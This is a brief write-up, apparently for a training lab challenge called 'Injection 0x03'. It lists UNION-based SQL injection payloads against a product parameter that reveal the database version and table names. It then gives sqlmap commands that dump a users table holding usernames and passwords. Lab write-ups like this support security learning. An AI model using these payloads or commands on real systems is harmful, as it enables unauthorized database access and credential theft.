Injection 0x03 [Challenge]

product=Tanjyoubi Sushi Rack' union select null,null,null,version()#

We can see the injection0x03_users

product=Tanjyoubi Sushi Rack' union select null,null,null,table_name from information_schema.tables#

We can see the column name like usernaem and password

Then we can see the username

We can see the password

use sqlmap

save the request to txt file

First do this

sqlmap -r injection3.txt

then

sqlmap -r injection3.txt --dump

sqlmap -r injection3.txt --dump -T injection0x03_users

Last updated 1 year ago